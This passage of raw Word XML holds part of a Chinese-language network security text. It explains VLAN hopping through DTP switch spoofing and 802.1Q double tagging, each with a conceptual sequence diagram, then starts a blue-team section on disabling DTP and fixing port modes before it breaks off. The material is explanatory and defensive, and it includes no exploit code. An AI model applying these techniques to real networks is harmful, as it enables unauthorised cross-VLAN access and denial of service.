          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">机理示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Mermaid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Attacker as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Switch as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交换机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> dynamic auto)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker-&gt;&gt;Switch: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DTP Desirable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Switch--&gt;&gt;Switch: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口协商为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trunk</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over Switch: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口模式变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk&lt;br&gt;允许多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker-&gt;&gt;Switch: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">带有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VLAN X/Y)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Switch-&gt;&gt;OtherVLANs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发至其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此图仅展示概念交互，实际</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文格式及协商状态机比此简化模型复杂【③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简化/示意】。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="123" w:name="双重标签攻击double-tagging"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">双重标签攻击（Double</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Tagging）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">双重标签攻击不需要欺骗端口变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Trunk，而是利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签处理的一个特性：当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收到未打标签的帧（或解除最外层标签后帧变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成员）时，交换机会直接将该帧转发到同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内的其他端口，而不再对其进行标签检查。攻击者如果位于某个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10），且知道网络中某条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并不是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10，就可以构造一个带有两层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的帧：外层标签设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1），内层标签设为目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">20）。当该帧进入交换机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口时，交换机会为其打上接入端口所属</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN（VLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10）的标签——但因为攻击者已经预先插入了自己的标签，实际帧会被视为带有双层标签。第一跳交换机在将该帧转发到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口时，会移除最外层标签（如果外层标签恰好等于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN），然后内层标签（VLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">20）露出，下一跳交换机就会根据内层标签将帧送入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">20。这样，攻击者就可以从原本仅能访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的端口，向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送单方向的流量【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理：基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准和交换机对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的处理规则】。该攻击方向为单向，因为返回流量必须能够经过同样复杂的路径回去，通常较难实现，但足以用于投递恶意广播帧或进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">机理示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Mermaid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Attacker as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VLAN 10 Access)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant SW1 as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交换机1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Trunk, Native VLAN 1)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant SW2 as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交换机2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Trunk, Native VLAN 1)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant Victim as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VLAN 20)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker-&gt;&gt;SW1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">双层标签帧&lt;br&gt;外层标签</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(Native)&lt;br&gt;内层标签</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN 20</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> SW1--&gt;&gt;SW1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">移除外层标签（Native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> SW1-&gt;&gt;SW2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单标签帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN 20 (Native </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不重打)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> SW2-&gt;&gt;Victim: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发至目标主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注意：此攻击依赖攻击者知道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，且要求其发送的帧能够被第一跳交换机在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上转发【②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境相关：Native</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非所有网络都使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1，具体取值视网络配置而定】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="125" w:name="vlan-跳跃防御对照框蓝队"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃防御对照框（蓝队）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃攻击的根本原因是端口模式与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协商的信任假设过于宽松，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Native VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被用于数据流量时产生的标签处理漏洞。蓝队的防御措施应遵循以下最佳实践：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在所有不需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的端口上，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">switchport mode access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令强制设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式，并关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DTP（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">switchport nonegotiate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。这样端口不会再发送或响应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文，杜绝协商欺骗。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，也建议将模式显式设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">trunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协商【②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境相关：命令具体语法因厂商和设备型号而异】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">静态配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
